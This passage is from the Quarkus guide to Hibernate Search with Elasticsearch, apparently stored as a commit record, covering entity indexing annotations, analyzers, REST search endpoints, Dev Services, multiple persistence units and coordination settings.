operations we will need.\n\nCreate the 
`org.acme.hibernate.search.elasticsearch.LibraryResource` class:\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch;\n\nimport java.util.List;\nimport java.util.Optional;\n\nimport javax.enterprise.event.Observes;\nimport javax.inject.Inject;\nimport javax.transaction.Transactional;\nimport javax.ws.rs.DELETE;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.POST;\nimport javax.ws.rs.PUT;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.core.MediaType;\n\nimport org.acme.hibernate.search.elasticsearch.model.Author;\nimport org.acme.hibernate.search.elasticsearch.model.Book;\nimport org.hibernate.search.mapper.orm.session.SearchSession;\nimport org.jboss.resteasy.reactive.RestForm;\nimport org.jboss.resteasy.reactive.RestQuery;\n\nimport io.quarkus.runtime.StartupEvent;\n\n@Path(\"\/library\")\npublic class LibraryResource {\n\n @PUT\n @Path(\"book\")\n @Transactional\n @Consumes(MediaType.APPLICATION_FORM_URLENCODED)\n public void addBook(@RestForm String title, @RestForm Long authorId) {\n Author author = Author.findById(authorId);\n if (author == null) {\n return;\n }\n\n Book book = new Book();\n book.title = title;\n book.author = author;\n book.persist();\n\n author.books.add(book);\n author.persist();\n }\n\n @DELETE\n @Path(\"book\/{id}\")\n @Transactional\n public void deleteBook(Long id) {\n Book book = Book.findById(id);\n if (book != null) {\n book.author.books.remove(book);\n book.delete();\n }\n }\n\n @PUT\n @Path(\"author\")\n @Transactional\n @Consumes(MediaType.APPLICATION_FORM_URLENCODED)\n public void addAuthor(@RestForm String firstName, @RestForm String lastName) {\n Author author = new Author();\n author.firstName = firstName;\n author.lastName = lastName;\n author.persist();\n }\n\n @POST\n @Path(\"author\/{id}\")\n @Transactional\n @Consumes(MediaType.APPLICATION_FORM_URLENCODED)\n public void updateAuthor(Long id, @RestForm String firstName, @RestForm String lastName) {\n Author author = Author.findById(id);\n if (author == null) {\n return;\n }\n author.firstName = firstName;\n author.lastName = lastName;\n author.persist();\n }\n\n @DELETE\n @Path(\"author\/{id}\")\n @Transactional\n public void deleteAuthor(Long id) {\n Author author = Author.findById(id);\n if (author != null) {\n author.delete();\n }\n }\n}\n----\n\nNothing out of the ordinary here: it is just good old Hibernate ORM with Panache operations in a REST service.\n\nIn fact, the interesting part is that we will need to add very few elements to make our full text search application working.\n\n== Using Hibernate Search annotations\n\nLet's go back to our entities.\n\nEnabling full text search capabilities for them is as simple as adding a few annotations.\n\nLet's edit the `Book` entity again to include this content:\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch.model;\n\nimport java.util.Objects;\n\nimport javax.persistence.Entity;\nimport javax.persistence.ManyToOne;\n\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.FullTextField;\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.Indexed;\n\nimport com.fasterxml.jackson.annotation.JsonIgnore;\n\nimport io.quarkus.hibernate.orm.panache.PanacheEntity;\n\n@Entity\n@Indexed \/\/ <1>\npublic class Book extends PanacheEntity {\n\n @FullTextField(analyzer = \"english\") \/\/ <2>\n public String title;\n\n @ManyToOne\n @JsonIgnore\n public Author author;\n\n \/\/ Preexisting equals()\/hashCode() methods\n}\n----\n<1> First, let's use the `@Indexed` annotation to register 
our `Book` entity as part of the full text index.\n<2> The `@FullTextField` annotation declares a field in the index specifically tailored for full text search.\nIn particular, we have to define an analyzer to split and analyze the tokens (~ words) - more on this later.\n\nNow that our books are indexed, we can do the same for the authors.\n\nOpen the `Author` class and include the content below.\n\nThings are quite similar here: we use the `@Indexed`, `@FullTextField` and `@KeywordField` annotations.\n\nThere are a few differences\/additions though. Let's check them out.\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch.model;\n\nimport java.util.List;\nimport java.util.Objects;\n\nimport javax.persistence.CascadeType;\nimport javax.persistence.Entity;\nimport javax.persistence.FetchType;\nimport javax.persistence.OneToMany;\n\nimport org.hibernate.search.engine.backend.types.Sortable;\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.FullTextField;\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.Indexed;\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.IndexedEmbedded;\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.KeywordField;\n\nimport io.quarkus.hibernate.orm.panache.PanacheEntity;\n\n@Entity\n@Indexed\npublic class Author extends PanacheEntity {\n\n @FullTextField(analyzer = \"name\") \/\/ <1>\n @KeywordField(name = \"firstName_sort\", sortable = Sortable.YES, normalizer = \"sort\") \/\/ <2>\n public String firstName;\n\n @FullTextField(analyzer = \"name\")\n @KeywordField(name = \"lastName_sort\", sortable = Sortable.YES, normalizer = \"sort\")\n public String lastName;\n\n @OneToMany(mappedBy = \"author\", cascade = CascadeType.ALL, orphanRemoval = true, fetch = FetchType.EAGER)\n @IndexedEmbedded \/\/ <3>\n public List<Book> books;\n\n \/\/ Preexisting equals()\/hashCode() methods\n}\n----\n<1> We use a `@FullTextField` similar to what we did for `Book` but you'll notice that the analyzer is different - more on this later.\n<2> As you can see, we can define several fields for the same property.\nHere, we define a `@KeywordField` with a specific name.\nThe main difference is that a keyword field is not tokenized (the string is kept as one single token) but can be normalized (i.e. filtered) - more on this later.\nThis field is marked as sortable as our intention is to use it for sorting our authors.\n<3> The purpose of `@IndexedEmbedded` is to include the `Book` fields into the `Author` index.\nIn this case, we just use the default configuration: all the fields of the associated `Book` entities are included in the index (i.e. 
the `title` field).\nThe nice thing with `@IndexedEmbedded` is that it is able to automatically reindex an `Author` if one of its ``Book``s has been updated thanks to the bidirectional relation.\n`@IndexedEmbedded` also supports nested documents (using the `storage = NESTED` attribute), but we don't need it here.\nYou can also specify the fields you want to include in your parent index using the `includePaths` attribute if you don't want them all.\n\n== Analyzers and normalizers\n\n=== Introduction\n\nAnalysis is a big part of full text search: it defines how text will be processed when indexing or building search queries.\n\nThe role of analyzers is to split the text into tokens (~ words) and filter them (making it all lowercase and removing accents for instance).\n\nNormalizers are a special type of analyzers that keeps the input as a single token.\nIt is especially useful for sorting or indexing keywords.\n\nThere are a lot of bundled analyzers, but you can also develop your own for your own specific purposes.\n\nYou can learn more about the Elasticsearch analysis framework in the https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/analysis.html[Analysis section of the Elasticsearch documentation].\n\n=== Defining the analyzers used\n\nWhen we added the Hibernate Search annotations to our entities, we defined the analyzers and normalizers used.\nTypically:\n\n[source,java]\n----\n@FullTextField(analyzer = \"english\")\n----\n\n[source,java]\n----\n@FullTextField(analyzer = \"name\")\n----\n\n[source,java]\n----\n@KeywordField(name = \"lastName_sort\", sortable = Sortable.YES, normalizer = \"sort\")\n----\n\nWe use:\n\n * an analyzer called `name` for person names,\n * an analyzer called `english` for book titles,\n * a normalizer called `sort` for our sort fields\n\nbut we haven't set them up yet.\n\nLet's see how you can do it with Hibernate Search.\n\n[[analysis-configurer]]\n=== Setting up the analyzers\n\nIt is an easy task, we just need to create an implementation of `ElasticsearchAnalysisConfigurer`\n(and configure Quarkus to use it, more on that later).\n\nTo fulfill our requirements, let's create the following implementation:\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch.config;\n\nimport org.hibernate.search.backend.elasticsearch.analysis.ElasticsearchAnalysisConfigurationContext;\nimport org.hibernate.search.backend.elasticsearch.analysis.ElasticsearchAnalysisConfigurer;\n\nimport javax.enterprise.context.Dependent;\nimport javax.inject.Named;\n\n@Dependent\n@Named(\"myAnalysisConfigurer\") \/\/ <1>\npublic class AnalysisConfigurer implements ElasticsearchAnalysisConfigurer {\n\n @Override\n public void configure(ElasticsearchAnalysisConfigurationContext context) {\n context.analyzer(\"name\").custom() \/\/ <2>\n .tokenizer(\"standard\")\n .tokenFilters(\"asciifolding\", \"lowercase\");\n\n context.analyzer(\"english\").custom() \/\/ <3>\n .tokenizer(\"standard\")\n .tokenFilters(\"asciifolding\", \"lowercase\", \"porter_stem\");\n\n context.normalizer(\"sort\").custom() \/\/ <4>\n .tokenFilters(\"asciifolding\", \"lowercase\");\n }\n}\n----\n<1> We will need to reference the configurer from the configuration properties, so we make it a named bean.\n<2> This is a simple analyzer separating the words on spaces, removing any non-ASCII characters by its ASCII counterpart (and thus removing accents) and putting everything in lowercase.\nIt is used in our examples for the author's names.\n<3> We are a bit more aggressive with this one 
and we include some stemming: we will be able to search for `mystery` and get a result even if the indexed input contains `mysteries`.\nIt is definitely too aggressive for person names, but it is perfect for the book titles.\n<4> Here is the normalizer used for sorting. Very similar to our first analyzer, except we don't tokenize the words as we want one and only one token.\n\n== Adding full text capabilities to our REST service\n\nIn our existing `LibraryResource`, we just need to inject the `SearchSession`:\n\n[source,java]\n----\n @Inject\n SearchSession searchSession; \/\/ <1>\n----\n<1> Inject a Hibernate Search session, which relies on the `EntityManager` under the hood.\nApplications with multiple persistence units can use the CDI qualifier `@io.quarkus.hibernate.orm.PersistenceUnit`\nto select the right one:\nsee <<multiple-persistence-units-attaching-cdi>>.\n\nAnd then we can add the following methods (and a few ``import``s):\n\n[source,java]\n----\n @Transactional \/\/ <1>\n void onStart(@Observes StartupEvent ev) throws InterruptedException { \/\/ <2>\n \/\/ only reindex if we imported some content\n if (Book.count() > 0) {\n searchSession.massIndexer()\n .startAndWait();\n }\n }\n\n @GET\n @Path(\"author\/search\") \/\/ <3>\n @Transactional\n public List<Author> searchAuthors(@RestQuery String pattern, \/\/ <4>\n @RestQuery Optional<Integer> size) {\n return searchSession.search(Author.class) \/\/ <5>\n .where(f ->\n pattern == null || pattern.trim().isEmpty() ?\n f.matchAll() : \/\/ <6>\n f.simpleQueryString()\n .fields(\"firstName\", \"lastName\", \"books.title\").matching(pattern) \/\/ <7>\n )\n .sort(f -> f.field(\"lastName_sort\").then().field(\"firstName_sort\")) \/\/ <8>\n .fetchHits(size.orElse(20)); \/\/ <9>\n }\n----\n<1> Important point: we need a transactional context for these methods.\n<2> As we will import data into the PostgreSQL database using an SQL script, we need to reindex the data at startup.\nFor this, we use Hibernate Search's mass indexer, which allows to index a lot of data efficiently (you can fine tune it for better performances).\nAll the upcoming updates coming through Hibernate ORM operations will be synchronized automatically to the full text index.\nIf you don't import data manually in the database, you don't need that:\nthe mass indexer should then only be used when you change your indexing configuration (adding a new field, changing an analyzer's configuration...) and you want the new configuration to be applied to your existing entities.\n<3> This is where the magic begins: just adding the annotations to our entities makes them available for full text search: we can now query the index using the Hibernate Search DSL.\n<4> Use the `org.jboss.resteasy.reactive.RestQuery` annotation type to avoid repeating the parameter name.\n<5> We indicate that we are searching for ``Author``s.\n<6> We create a predicate: if the pattern is empty, we use a `matchAll()` predicate.\n<7> If we have a valid pattern, we create a https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/query-dsl-simple-query-string-query.html[`simpleQueryString()`] predicate on the `firstName`, `lastName` and `books.title` fields matching our pattern.\n<8> We define the sort order of our results. Here we sort by last name, then by first name. Note that we use the specific fields we created for sorting.\n<9> Fetch the `size` top hits, `20` by default. 
Obviously, paging is also supported.\n\n[NOTE]\n====\nThe Hibernate Search DSL supports a significant subset of the Elasticsearch predicates (match, range, nested, phrase, spatial...).\nFeel free to explore the DSL using autocompletion.\n\nWhen that's not enough, you can always fall back to\nlink:{hibernate-search-doc-prefix}#search-dsl-predicate-extensions-elasticsearch-from-json[defining a predicate using JSON directly].\n====\n\n== Configuring the application\n\nAs usual, we can configure everything in the Quarkus configuration file, `application.properties`.\n\nEdit `src\/main\/resources\/application.properties` and inject the following configuration:\n\n[source,properties]\n----\nquarkus.ssl.native=false <1>\n\nquarkus.datasource.db-kind=postgresql <2>\n\n%dev.quarkus.hibernate-orm.database.generation=drop-and-create <3>\n%test.quarkus.hibernate-orm.database.generation=drop-and-create <3>\nquarkus.hibernate-orm.sql-load-script=import.sql <4>\n\nquarkus.hibernate-search-orm.elasticsearch.version=7 <5>\nquarkus.hibernate-search-orm.elasticsearch.analysis.configurer=bean:myAnalysisConfigurer <6>\n%dev.quarkus.hibernate-search-orm.schema-management.strategy=drop-and-create <7>\n%test.quarkus.hibernate-search-orm.schema-management.strategy=drop-and-create <7>\nquarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy=sync <8>\n\n%prod.quarkus.datasource.jdbc.url=jdbc:postgresql:\/\/localhost\/quarkus_test <9>\n%prod.quarkus.datasource.username=quarkus_test\n%prod.quarkus.datasource.password=quarkus_test\n%prod.hibernate-search-orm.elasticsearch.hosts=localhost:9200 <9>\n----\n<1> We won't use SSL, so we disable it to have a more compact native executable.\n<2> Let's create a PostgreSQL datasource.\n<3> In dev mode and in tests, we will drop and recreate the schema on startup.\n<4> We load some initial data on startup.\n<5> We need to tell Hibernate Search about the version of Elasticsearch we will use.\nIt is important because there are significant differences between Elasticsearch mapping syntax depending on the version.\nSince the mapping is created at build time to reduce startup time, Hibernate Search cannot connect to the cluster to automatically detect the version.\nNote that, for OpenSearch, you need to prefix the version with `opensearch:`; see <<opensearch>>.\n<6> We point to the custom `AnalysisConfigurer` which defines the configuration of our analyzers and normalizers.\n<7> In dev mode and in tests, we will drop and recreate the index on startup.\n<8> This means that we wait for the entities to be searchable before considering a write complete.\nOn a production setup, the `write-sync` default will provide better performance.\nUsing `sync` is especially important when testing as you need the entities to be searchable immediately.\n<9> For development and tests, we rely on <<dev-services,Dev Services>>,\nwhich means Quarkus will start a PostgreSQL database and Elasticsearch cluster automatically.\nIn production mode, however,\nyou will want to start a PostgreSQL database and Elasticsearch cluster manually,\nwhich is why we provide Quarkus with this connection info in the `prod` profile (`%prod.` prefix).\n\n[TIP]\nFor more information about the Hibernate Search extension configuration please refer to the <<configuration-reference, Configuration Reference>>.\n\n[[dev-services]]\n=== Dev Services (Configuration Free Databases)\nQuarkus supports a feature called Dev Services that allows you to start various containers without any config.\nIn the case of Elasticsearch 
\nNOTE: Dev Services for Elasticsearch is currently unable to start multiple clusters concurrently, so it only works with the default backend of the default persistence unit: named persistence units or named backends won't be able to take advantage of Dev Services for Elasticsearch.\n\nFor more information, you can read the xref:elasticsearch-dev-services.adoc[Dev Services for Elasticsearch guide].\n\n== Creating a frontend\n\nNow let's add a simple web page to interact with our `LibraryResource`.\nQuarkus automatically serves static resources located under the `META-INF\/resources` directory.\nIn the `src\/main\/resources\/META-INF\/resources` directory, overwrite the existing `index.html` file with the content from this\n{quickstarts-blob-url}\/hibernate-search-orm-elasticsearch-quickstart\/src\/main\/resources\/META-INF\/resources\/index.html[index.html] file.\n\n== Automatic import script\n\nFor the purpose of this demonstration, let's import an initial dataset.\n\nLet's create a `src\/main\/resources\/import.sql` file with the following content:\n\n[source,sql]\n----\nINSERT INTO author(id, firstname, lastname) VALUES (nextval('hibernate_sequence'), 'John', 'Irving');\nINSERT INTO author(id, firstname, lastname) VALUES (nextval('hibernate_sequence'), 'Paul', 'Auster');\n\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'The World According to Garp', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'The Hotel New Hampshire', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'The Cider House Rules', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'A Prayer for Owen Meany', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'Last Night in Twisted River', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'In One Person', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'Avenue of Mysteries', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'The New York Trilogy', 2);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'Mr. 
Vertigo', 2);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'The Brooklyn Follies', 2);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'Invisible', 2);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'Sunset Park', 2);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), '4 3 2 1', 2);\n----\n\n== Time to play with your application\n\nYou can now interact with your REST service:\n\n:devtools-wrapped:\n\n * start your Quarkus application with:\n+\ninclude::{includes}\/devtools\/dev.adoc[]\n * open a browser to `http:\/\/localhost:8080\/`\n * search for authors or book titles (we initialized some data for you)\n * create new authors and books and search for them too\n\n:!devtools-wrapped:\n\nAs you can see, all your updates are automatically synchronized to the Elasticsearch cluster.\n\n[[opensearch]]\n== OpenSearch compatibility\n\nHibernate Search is compatible with both https:\/\/www.elastic.co\/elasticsearch[Elasticsearch]\nand https:\/\/www.opensearch.org\/[OpenSearch],\nbut it assumes it is working with an Elasticsearch cluster by default.\n\nTo have Hibernate Search work with an OpenSearch cluster instead,\nlink:{hibernate-search-doc-prefix}#backend-elasticsearch-configuration-version[prefix the configured version with `opensearch:`],\nas shown below.\n\n[source,properties]\n----\nquarkus.hibernate-search-orm.elasticsearch.version=opensearch:1.2\n----\n\nAll other configuration options and APIs are exactly the same as with Elasticsearch.\n\nYou can find more information about compatible distributions and versions of Elasticsearch in\nlink:{hibernate-search-doc-prefix}#getting-started-compatibility[this section of Hibernate Search's reference documentation].\n\n[[multiple-persistence-units]]\n== Multiple persistence units\n\n=== Configuring multiple persistence units\n\nWith the Hibernate ORM extension,\nxref:hibernate-orm.adoc#multiple-persistence-units[you can set up multiple persistence units],\neach with its own datasource and configuration.\n\nIf you do declare multiple persistence units,\nyou will also configure Hibernate Search separately for each persistence unit.\n\nThe properties at the root of the `quarkus.hibernate-search-orm.` namespace define the default persistence unit.\nFor instance, the following snippet defines a default datasource and a default persistence unit,\nand sets the Elasticsearch host for that persistence unit to `es1.mycompany.com:9200`.\n\n[source,properties]\n----\nquarkus.datasource.db-kind=h2\nquarkus.datasource.jdbc.url=jdbc:h2:mem:default;DB_CLOSE_DELAY=-1\n\nquarkus.hibernate-orm.dialect=org.hibernate.dialect.H2Dialect\n\nquarkus.hibernate-search-orm.elasticsearch.hosts=es1.mycompany.com:9200\nquarkus.hibernate-search-orm.elasticsearch.version=7\n----\n\nUsing a map based approach, it is also possible to configure named persistence units:\n\n[source,properties]\n----\nquarkus.datasource.\"users\".db-kind=h2 <1>\nquarkus.datasource.\"users\".jdbc.url=jdbc:h2:mem:users;DB_CLOSE_DELAY=-1\n\nquarkus.datasource.\"inventory\".db-kind=h2 <2>\nquarkus.datasource.\"inventory\".jdbc.url=jdbc:h2:mem:inventory;DB_CLOSE_DELAY=-1\n\nquarkus.hibernate-orm.\"users\".datasource=users <3>\nquarkus.hibernate-orm.\"users\".packages=org.acme.model.user\n\nquarkus.hibernate-orm.\"inventory\".datasource=inventory 
<4>\nquarkus.hibernate-orm.\"inventory\".packages=org.acme.model.inventory\n\nquarkus.hibernate-search-orm.\"users\".elasticsearch.hosts=es1.mycompany.com:9200 <5>\nquarkus.hibernate-search-orm.\"users\".elasticsearch.version=7\n\nquarkus.hibernate-search-orm.\"inventory\".elasticsearch.hosts=es2.mycompany.com:9200 <6>\nquarkus.hibernate-search-orm.\"inventory\".elasticsearch.version=7\n----\n<1> Define a datasource named `users`.\n<2> Define a datasource named `inventory`.\n<3> Define a persistence unit called `users` pointing to the `users` datasource.\n<4> Define a persistence unit called `inventory` pointing to the `inventory` datasource.\n<5> Configure Hibernate Search for the `users` persistence unit,\nsetting the Elasticsearch host for that persistence unit to `es1.mycompany.com:9200`.\n<6> Configure Hibernate Search for the `inventory` persistence unit,\nsetting the Elasticsearch host for that persistence unit to `es2.mycompany.com:9200`.\n\n[[multiple-persistence-units-attaching-model-classes]]\n=== Attaching model classes to persistence units\n\nFor each persistence unit, Hibernate Search will only consider indexed entities that are attached to that persistence unit.\nEntities are attached to a persistence unit by\nxref:hibernate-orm.adoc#multiple-persistence-units-attaching-model-classes[configuring the Hibernate ORM extension].\n\n[[multiple-persistence-units-attaching-cdi]]\n== CDI integration\n\nYou can inject Hibernate Search's main entry points, `SearchSession` and `SearchMapping`, using CDI:\n\n[source,java]\n----\n@Inject\nSearchSession searchSession;\n----\n\nThis will inject the `SearchSession` of the default persistence unit.\n\nTo inject the `SearchSession` of a named persistence unit (`users` in our example),\njust add a qualifier:\n\n[source,java]\n----\n@Inject\n@PersistenceUnit(\"users\") <1>\nSearchSession searchSession;\n----\n<1> This is the `@io.quarkus.hibernate.orm.PersistenceUnit` annotation.\n\nYou can inject the `SearchMapping` of a named persistence unit using the exact same mechanism:\n\n[source,java]\n----\n@Inject\n@PersistenceUnit(\"users\")\nSearchMapping searchMapping;\n----\n\n== Building a native executable\n\nYou can build a native executable with the usual command `.\/mvnw package -Pnative`.\n\n[NOTE]\n====\nAs usual with native executable compilation, this operation consumes a lot of memory.\n\nIt might be safer to stop the two containers while you are building the native executable and start them again once you are done.\n====\n\nRunning it is as simple as executing `.\/target\/hibernate-search-orm-elasticsearch-quickstart-1.0.0-SNAPSHOT-runner`.\n\nYou can then point your browser to `http:\/\/localhost:8080\/` and use your application.\n\n[NOTE]\n====\nThe startup is a bit slower than usual: it is mostly due to us dropping and recreating the database schema and the Elasticsearch mapping every time at startup.\nWe also inject some data and execute the mass indexer.\n\nIn a real-life application, this is obviously something you won't do at startup.\n====\n\n[[offline-startup]]\n== Offline startup\n\nBy default, Hibernate Search sends a few requests to the Elasticsearch cluster on startup.\nIf the Elasticsearch cluster is not necessarily up and running when Hibernate Search starts,\nthis could cause a startup failure.\n\nTo address this, you can configure Hibernate Search to not send any request on startup (both settings are combined in the snippet after this list):\n\n* Disable Elasticsearch version checks on startup by setting the configuration property\n link:#quarkus-hibernate-search-orm-elasticsearch_quarkus.hibernate-search-orm.elasticsearch.version-check.enabled[`quarkus.hibernate-search-orm.elasticsearch.version-check.enabled`]\n to `false`.\n* Disable schema management on startup by setting the configuration property\n link:#quarkus-hibernate-search-orm-elasticsearch_quarkus.hibernate-search-orm.schema-management.strategy[`quarkus.hibernate-search-orm.schema-management.strategy`]\n to `none`.\n
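\nA minimal sketch of the resulting configuration, combining the two properties named in the list above:\n\n[source,properties]\n----\n# Do not send any request to the Elasticsearch cluster on startup\nquarkus.hibernate-search-orm.elasticsearch.version-check.enabled=false\nquarkus.hibernate-search-orm.schema-management.strategy=none\n----\n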
\nOf course, even with this configuration, Hibernate Search still won't be able to index anything or run search queries\nuntil the Elasticsearch cluster becomes accessible.\n\n[IMPORTANT]\n====\nIf you disable automatic schema creation by setting `quarkus.hibernate-search-orm.schema-management.strategy` to `none`,\nyou will have to create the schema manually at some point before your application starts persisting\/updating entities\nand executing search requests.\n\nSee link:{hibernate-search-doc-prefix}#mapper-orm-schema-management-manager[this section of the reference documentation]\nfor more information.\n====\n\n[[coordination]]\n== Coordination through outbox polling\n\n[CAUTION]\n====\nCoordination through outbox polling is considered preview.\n\nIn _preview_, backward compatibility and presence in the ecosystem is not guaranteed.\nSpecific improvements might require changing configuration or APIs, or even storage formats,\nand plans to become _stable_ are under way.\nFeedback is welcome on our https:\/\/groups.google.com\/d\/forum\/quarkus-dev[mailing list]\nor as issues in our https:\/\/github.com\/quarkusio\/quarkus\/issues[GitHub issue tracker].\n====\n\nWhile it\u2019s technically possible to use Hibernate Search and Elasticsearch in distributed applications,\nby default they suffer from\nlink:{hibernate-search-doc-prefix}#architecture-examples-no-coordination-elasticsearch-pros-and-cons[a few limitations].\n\nThese limitations are the result of Hibernate Search not coordinating between threads or application nodes by default.\n\nIn order to get rid of these limitations, you can\nlink:{hibernate-search-doc-prefix}#architecture-examples-outbox-polling-elasticsearch[use the `outbox-polling` coordination strategy].\nThis strategy creates an outbox table in the database to push entity change events to,\nand relies on a background processor to consume these events and perform automatic indexing.\n\nTo enable the `outbox-polling` coordination strategy, an additional extension is required:\n\n:add-extension-extensions: hibernate-search-orm-coordination-outbox-polling\ninclude::{includes}\/devtools\/extension-add.adoc[]\n\nOnce the extension is there, you will need to explicitly select the `outbox-polling` strategy\nby setting link:#quarkus-hibernate-search-orm-elasticsearch_quarkus.hibernate-search-orm.coordination.strategy[`quarkus.hibernate-search-orm.coordination.strategy`]\nto `outbox-polling`.\n\nFinally, you will need to make sure that the Hibernate ORM entities added by Hibernate Search\n(to represent the outbox and agents) have corresponding tables\/sequences in your database:\n\n* If you are just starting with your application\nand intend to xref:hibernate-orm.adoc#dev-mode[let Hibernate ORM generate your database schema],\nthen no worries: the entities required by Hibernate Search will be included in the generated schema.\n* Otherwise, you must\nlink:{hibernate-search-doc-prefix}#coordination-outbox-polling-schema[manually alter your schema to add the necessary tables\/sequences].\n\nOnce you are done with the above, you're ready 
to use Hibernate Search with an outbox.\nDon't change any code, and just start your application:\nit will automatically detect when multiple applications are connected to the same database,\nand coordinate the index updates accordingly.\n\n[NOTE]\n====\nHibernate Search mostly behaves the same when using the `outbox-polling` coordination strategy\nas when not using it: application code (persisting entities, searching, etc.) should not require any change.\n\nHowever, there is one key difference: index updates are necessarily asynchronous;\nthey are guaranteed to happen _eventually_, but not immediately.\n\nThis means in particular that the configuration property\nlink:#quarkus-hibernate-search-orm-elasticsearch_quarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy[`quarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy`]\ncannot be set when using the `outbox-polling` coordination strategy:\nHibernate Search will always behave as if this property was set to `write-sync` (the default).\n\nThis behavior is consistent with Elasticsearch's\nhttps:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/near-real-time.html[near-real-time search]\nand the recommended way of using Hibernate Search even when coordination is disabled.\n====\n\nFor more information about coordination in Hibernate Search,\nsee link:{hibernate-search-doc-prefix}#coordination[this section of the reference documentation].\n\nFor more information about configuration options related to coordination,\nsee <<configuration-reference-coordination-outbox-polling>>.\n\n[[aws-request-signing]]\n== [[configuration-reference-aws]] AWS request signing\n\nIf you need to use https:\/\/docs.aws.amazon.com\/elasticsearch-service\/[Amazon\u2019s managed Elasticsearch service],\nyou will find it requires a proprietary authentication method involving request signing.\n\nYou can enable AWS request signing in Hibernate Search by adding a dedicated extension to your project and configuring it.\n\nSee link:{hibernate-search-orm-elasticsearch-aws-guide}#aws-configuration-reference[the documentation for the Hibernate Search ORM + Elasticsearch AWS extension]\nfor more information.\n\n== Further reading\n\nIf you are interested in learning more about Hibernate Search 6,\nthe Hibernate team publishes link:{hibernate-search-doc-prefix}[an extensive reference documentation].\n\n== FAQ\n\n=== Why Elasticsearch only?\n\nHibernate Search supports both a Lucene backend and an Elasticsearch backend.\n\nIn the context of Quarkus and to build microservices, we thought the latter would make more sense.\nThus, we focused our efforts on it.\n\nWe don't have plans to support the Lucene backend in Quarkus for now.\n\n[[configuration-reference]]\n== Hibernate Search Configuration Reference\n\n[[configuration-reference-main]]\n=== Main Configuration\n\ninclude::{generated-dir}\/config\/quarkus-hibernate-search-orm-elasticsearch.adoc[leveloffset=+1, opts=optional]\n\n[NOTE]\n[[bean-reference-note-anchor]]\n.About bean references\n====\nWhen referencing beans using a string value in configuration properties, that string is parsed.\n\nHere are the most common formats:\n\n* `bean:` followed by the name of a `@Named` CDI bean.\nFor example `bean:myBean`.\n* `class:` followed by the fully-qualified name of a class, to be instantiated through CDI if it's a CDI bean,\nor through its public, no-argument constructor otherwise.\nFor example `class:com.mycompany.MyClass`.\n* An arbitrary string referencing a built-in 
implementation.\nAvailable values are detailed in the documentation of each configuration property,\nsuch as `async`\/`read-sync`\/`write-sync`\/`sync` for\n<<quarkus-hibernate-search-orm-elasticsearch_quarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy,`quarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy`>>.\n\nOther formats are also accepted, but are only useful for advanced use cases.\nSee link:{hibernate-search-doc-prefix}#configuration-bean-reference-parsing[this section of Hibernate Search's reference documentation]\nfor more information.\n====\n\n:no-duration-note: true\n\n[[configuration-reference-coordination-outbox-polling]]\n=== Configuration of coordination with outbox polling\n\nNOTE: These configuration properties require an additional extension. See <<coordination>>.\n\ninclude::{generated-dir}\/config\/quarkus-hibernate-search-orm-coordination-outboxpolling.adoc[leveloffset=+1, opts=optional]\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Hibernate Search guide\n:hibernate-search-doc-prefix: https:\/\/docs.jboss.org\/hibernate\/search\/6.1\/reference\/en-US\/html_single\/\ninclude::.\/attributes.adoc[]\n\nYou have a Hibernate ORM-based application? You want to provide a full-featured full-text search to your users? You're at the right place.\n\nWith this guide, you'll learn how to synchronize your entities to an Elasticsearch or OpenSearch cluster in a heartbeat with Hibernate Search.\nWe will also explore how you can query your Elasticsearch or OpenSearch cluster using the Hibernate Search API.\n\n== Prerequisites\n\n:prerequisites-time: 20 minutes\n:prerequisites-docker:\ninclude::{includes}\/prerequisites.adoc[]\n\n== Architecture\n\nThe application described in this guide allows to manage a (simple) library: you manage authors and their books.\n\nThe entities are stored in a PostgreSQL database and indexed in an Elasticsearch cluster.\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `hibernate-search-orm-elasticsearch-quickstart` {quickstarts-tree-url}\/hibernate-search-orm-elasticsearch-quickstart[directory].\n\n[NOTE]\n====\nThe provided solution contains a few additional elements such as tests and testing infrastructure.\n====\n\n== Creating the Maven project\n\nFirst, we need a new project. 
